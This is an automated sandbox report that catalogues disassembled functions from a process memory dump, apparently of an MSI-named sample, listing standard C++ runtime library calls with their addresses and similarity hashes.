std::_Lockit::~_Lockit.LIBCPMT ref: 001A7AE0

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 704675ee4e60991c073016dc4ded148ee269e831003e48ef13b4bd915b49391d
Instruction ID: 5665846e5a054e6a39da5fdb5ab70af8610d575c5997d836cae77fa72f41d343
Opcode Fuzzy Hash: 704675ee4e60991c073016dc4ded148ee269e831003e48ef13b4bd915b49391d
Instruction Fuzzy Hash: 6D01D2799082199BCF04FB64D9456BEBB65AFA5720F290409E411AB3D2DF709F05CBC0

Function 001B3A80 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B3A87
std::_Lockit::_Lockit.LIBCPMT ref: 001B3A91

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001B3AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 001B3B02

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 56f5f51b2ed0ea8df9107cbbdad1da6d73ad9e99e7c07e752c68d42608d7efe2
Instruction ID: 074cff1cb694a45d18e0e6fa8aa5e849af915ca0d380ef8879b462a78335e245
Opcode Fuzzy Hash: 56f5f51b2ed0ea8df9107cbbdad1da6d73ad9e99e7c07e752c68d42608d7efe2
Instruction Fuzzy Hash: BA01F5399042199BCF05FB64D9466FEB775AFA4720F250409E422AB3D1DF709F01CB80

Function 001A7AF3 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7AFA
std::_Lockit::_Lockit.LIBCPMT ref: 001A7B04

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A7B55
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7B75

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 7b85b3f292c346362a6d77baef2697280d100411c94d1d6df6529f6aaf729d8e
Instruction ID: 8c79b6a98f2fa4132c535d075d621a326456bc980995c9f4de51770c91f018f6
Opcode Fuzzy Hash: 7b85b3f292c346362a6d77baef2697280d100411c94d1d6df6529f6aaf729d8e
Instruction Fuzzy Hash: C901D2799082198BCF05EFA4D8456BEB775AFA1720F25000AE511AB6D1CF709F01CBD0

Function 001A7B88 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7B8F
std::_Lockit::_Lockit.LIBCPMT ref: 001A7B99

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A7BEA
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7C0A

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 9334b7f4d96d636c47fb80fbbd2abf1942856c3694ba53490bb86ed8079ca7d9
Instruction ID: 694b2078625aa28e4edb5aaf8f7aa768786f82c2b86c87d2f63bcff1eedcb3fc
Opcode Fuzzy Hash: 9334b7f4d96d636c47fb80fbbd2abf1942856c3694ba53490bb86ed8079ca7d9
Instruction Fuzzy Hash: 2D01D27A9042298BCF05EBA4D9456BEB775AFA6720F240409E411AB2D2DF709F02CBD0

Function 001B3C3F Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B3C46
std::_Lockit::_Lockit.LIBCPMT ref: 001B3C50

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001B3CA1
std::_Lockit::~_Lockit.LIBCPMT ref: 001B3CC1

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: c91346248cc1281b27dca908c597df25f23319da081f84e4bd7e50b71f5e23b2
Instruction ID: b1ae4925a9a8a4461a92c4ee434ef62da2c3453ce2cd1f7185e23d2001321aaa
Opcode Fuzzy Hash: c91346248cc1281b27dca908c597df25f23319da081f84e4bd7e50b71f5e23b2
Instruction Fuzzy Hash: 6801D6399045199BCF04EBA8D9456FEBB75AFA4720F14440AE421B7391DF709F05CBC0

Function 001B3CD4 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B3CDB
std::_Lockit::_Lockit.LIBCPMT ref: 001B3CE5

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001B3D36
std::_Lockit::~_Lockit.LIBCPMT ref: 001B3D56

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 210197dfd7ddfd4ed5e394cf8e81df0cf03142c60072994c0ced4dded5456097
Instruction ID: 0f0c6f38fc1351b967f8290f1912829c326ae20acb7ae51e3605fb278ec3791a
Opcode Fuzzy Hash: 210197dfd7ddfd4ed5e394cf8e81df0cf03142c60072994c0ced4dded5456097
Instruction Fuzzy Hash: D401C0359042199FCF04EBA4D8456BEB7A5AFA0720F650409E422AB2D2CF709E01CB80

Function 001A7E71 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7E78
std::_Lockit::_Lockit.LIBCPMT ref: 001A7E82

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A7ED3
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7EF3

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 9e16f2d2626fc53d0055775044153340ce92075f17bf23999da3ab83405801e0
Instruction ID: 50cb697a4d7a678c800e82b4e2eb9531adf2db54bcff0b84705561bb27d6c492
Opcode Fuzzy Hash: 9e16f2d2626fc53d0055775044153340ce92075f17bf23999da3ab83405801e0
Instruction Fuzzy Hash: A80122399052198FCF05EB64D9416BEB7A6AFA1720F240009E411AB3C2DF709F01CB90

Function 001A7F06 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7F0D
std::_Lockit::_Lockit.LIBCPMT ref: 001A7F17

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A7F68
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7F88

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 7cd6704ad751be8124d825ffb4af29b1e95cd92ef0322ef0a15ec95309f5b783
Instruction ID: eb24ab52aee492471548311e619be6db97792ff795a9a8ea3df17ef78fa8cb32
Opcode Fuzzy Hash: 7cd6704ad751be8124d825ffb4af29b1e95cd92ef0322ef0a15ec95309f5b783
Instruction Fuzzy Hash: A601D2399086199FCF05EBA8D9456BEB776AFA1720F244409F511AB2D2DF749F01CB80

Function 001A7F9B Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7FA2
std::_Lockit::_Lockit.LIBCPMT ref: 001A7FAC

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A7FFD
std::_Lockit::~_Lockit.LIBCPMT ref: 001A801D

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 420da3769927b36f75ba2ca498b0c6dcbbca93759206a0d36de610b618b7ed33
Instruction ID: d991a61d0d06eab6b57c87282b80b4799334fe1a9c3ed90d473c1b3d7da33d18
Opcode Fuzzy Hash: 420da3769927b36f75ba2ca498b0c6dcbbca93759206a0d36de610b618b7ed33
Instruction Fuzzy Hash: 9D01DE39904219DBCF05FB64D9466BEB7B6AFA5720F250009F511AB2D2DF709E45CB80

Function 001A5C66 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A5C6D
std::_Lockit::_Lockit.LIBCPMT ref: 001A5C78
std::_Lockit::~_Lockit.LIBCPMT ref: 001A5CE6

Part of subcall function 001A5DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 001A5DE0

std::locale::_Setgloballocale.LIBCPMT ref: 001A5C93

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: 29e747e80b296dfa2e6ee8f4da516e98a68a0480145b1c11d306e45f3c34f58a
Instruction ID: 8fbd77991dee7bd7b59c84f8fa59ef9ed7d7dc3b6fff395415fb69a17dfecfbc
Opcode Fuzzy Hash: 29e747e80b296dfa2e6ee8f4da516e98a68a0480145b1c11d306e45f3c34f58a
Instruction Fuzzy Hash: 8101A279A05A109FDB05FFA0DC4557D7BA6FF96750B18400AE81257381CF74AE42DBC1

Function 001D8C76 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,001D8643,?,00000001,?,?,?,001D7788,?,?,00000000), ref: 001D8C8D
GetLastError.KERNEL32(?,001D8643,?,00000001,?,?,?,001D7788,?,?,00000000,?,?,?,001D7D0F,?), ref: 001D8C99

Part of subcall function 001D8C5F: CloseHandle.KERNEL32(FFFFFFFE,001D8CA9,?,001D8643,?,00000001,?,?,?,001D7788,?,?,00000000,?,?), ref: 001D8C6F

___initconout.LIBCMT ref: 001D8CA9

Part of subcall function 001D8C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001D8C50,001D8630,?,?,001D7788,?,?,00000000,?), ref: 001D8C34

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,001D8643,?,00000001,?,?,?,001D7788,?,?,00000000,?), ref: 001D8CBE

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 23207555a4db6dd05314d8d17d4562e6771f6f351681610a7d5f0ac66f65805c
Instruction ID: 88893ad250bdd758917bb902daed6c964c51e7a5335fc7562910e60a3ed7dfb7
Opcode Fuzzy Hash: 23207555a4db6dd05314d8d17d4562e6771f6f351681610a7d5f0ac66f65805c
Instruction Fuzzy Hash: A2F01C36012155BBCF222F91EC049D93F66EF487A0F104452FA1996620DB32C960EBA0

Function 001B78FD Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,001B789A,00000064), ref: 001B7920
LeaveCriticalSection.KERNEL32(001F4AF8,?,?,001B789A,00000064,?,?,001925B6,001F571C,08E011E3,?,00000000,001D93ED,000000FF,?,00191A26), ref: 001B792A
WaitForSingleObjectEx.KERNEL32(?,00000000,?,001B789A,00000064,?,?,001925B6,001F571C,08E011E3,?,00000000,001D93ED,000000FF,?,00191A26), ref: 001B793B
EnterCriticalSection.KERNEL32(001F4AF8,?,001B789A,00000064,?,?,001925B6,001F571C,08E011E3,?,00000000,001D93ED,000000FF,?,00191A26), ref: 001B7942

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 51d462e648efc8a0999e477b4b2f17413f7d8ca6a57418f6d5ddb7f2a4a1486a
Instruction ID: e846acf2ea894dc64ecfa1c28623cdbed0d99788acc197d47cb1192467807c24
Opcode Fuzzy Hash: 51d462e648efc8a0999e477b4b2f17413f7d8ca6a57418f6d5ddb7f2a4a1486a
Instruction Fuzzy Hash: 95E092329C7228A7C7112B50FC08AAE3F14EB44735B014052F606639A0CBA048819BD8

Function 001C709D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001C712D

Strings

pow, xrefs: 001C7105, 001C7122

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 8e04fada7b39733a98f9435f1bc39d96025032d2fc7e60609c50118cd560bbd3
Instruction ID: 86246e1d74574254542811199e9fba2e285289112efae8b03b44412933c0e706
Opcode Fuzzy Hash: 8e04fada7b39733a98f9435f1bc39d96025032d2fc7e60609c50118cd560bbd3
Instruction Fuzzy Hash: 7F519B60A0C202D6CB157B54D951F7EABA5EB70740F248D7CF095462E9EB70CCD69F42

Function 001B6C34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 001B6D98

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 001B6CFE, 001B6D35, 001B6D3A
-, xrefs: 001B6DC9

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: 9a01b7c65387bdf399bc903bbb133b477564be341899ba93aef64d9f8a1c2804
Instruction ID: 298a81ec93cdca76efde2d408b8cfe91f109d7d26e90c92aa7ccb8d1a555f2f7
Opcode Fuzzy Hash: 9a01b7c65387bdf399bc903bbb133b477564be341899ba93aef64d9f8a1c2804
Instruction Fuzzy Hash: 7C51E270B042586BDF299EAD88917FEBFFAAF75700F14406EE8C5D7245C37889428B90

Function 0019F860 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0019FA3E

Strings

false, xrefs: 0019F965
true, xrefs: 0019F97B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: false$true
API String ID: 118556049-2658103896
Opcode ID: 94b603da7b5083cbf21104e71e1847599c7e4e267765838cd8c285960480f387
Instruction ID: cc84bebc9f609238d5ed6d33613d7c5d6ee06da9f923a852f2f1c6ddf73f2007
Opcode Fuzzy Hash: 94b603da7b5083cbf21104e71e1847599c7e4e267765838cd8c285960480f387
Instruction Fuzzy Hash: F151B4B5D003489FDB10DFA4C941BEEBBB8FF19314F14826EE845AB281E774AA45CB51

Function 001B22AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001B22B1
_swprintf.LIBCMT ref: 001B2329

Part of subcall function 001A780A: __EH_prolog3.LIBCMT ref: 001A7811
Part of subcall function 001A780A: std::_Lockit::_Lockit.LIBCPMT ref: 001A781B
Part of subcall function 001A780A: std::_Lockit::~_Lockit.LIBCPMT ref: 001A788C

Strings

%.0Lf, xrefs: 001B2321

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
String ID: %.0Lf
API String ID: 2348759532-1402515088
Opcode ID: d4cf9c67c754b7d75823fe79ffc7dbeaf6ab631d5d75bcd8b6c3fb12959bd6c8
Instruction ID: 1dabe4f23a84564234bd8943561841dcb773f94bb14ff0c84c7625ffdf233335
Opcode Fuzzy Hash: d4cf9c67c754b7d75823fe79ffc7dbeaf6ab631d5d75bcd8b6c3fb12959bd6c8
Instruction Fuzzy Hash: 40514E71D00219ABCF09EFE4D855ADDBBB9FF08300F20495AE506AB2A5DB349945CF90

Function 001B258E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001B2595
_swprintf.LIBCMT ref: 001B260D

Part of subcall function 0019B500: std::_Lockit::_Lockit.LIBCPMT ref: 0019B52D
Part of subcall function 0019B500: std::_Lockit::_Lockit.LIBCPMT ref: 0019B550
Part of subcall function 0019B500: std::_Lockit::~_Lockit.LIBCPMT ref: 0019B578
Part of subcall function 0019B500: std::_Lockit::~_Lockit.LIBCPMT ref: 0019B617

Strings

%.0Lf, xrefs: 001B2605

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: %.0Lf
API String ID: 1487807907-1402515088
Opcode ID: ab96798e77b1c69bc306ee927088e577495ac9c0f6b494e739f382d76b58f7a4
Instruction ID: ed278d7e1c7848b94080d5d1b5c52a6d27615a5e48ca76b57332cb202e496c17
Opcode Fuzzy Hash: ab96798e77b1c69bc306ee927088e577495ac9c0f6b494e739f382d76b58f7a4
Instruction Fuzzy Hash: 51516E71D00209AFDF09EFE4D895ADDBBB9FF18300F20451AE546AB295EB349945CF90

Function 001B6607 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001B660E
_swprintf.LIBCMT ref: 001B6686

Part of subcall function 0019C590: std::_Lockit::_Lockit.LIBCPMT ref: 0019C5BD
Part of subcall function 0019C590: std::_Lockit::_Lockit.LIBCPMT ref: 0019C5E0
Part of subcall function 0019C590: std::_Lockit::~_Lockit.LIBCPMT ref: 0019C608
Part of subcall function 0019C590: std::_Lockit::~_Lockit.LIBCPMT ref: 0019C6A7

Strings

%.0Lf, xrefs: 001B667E

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

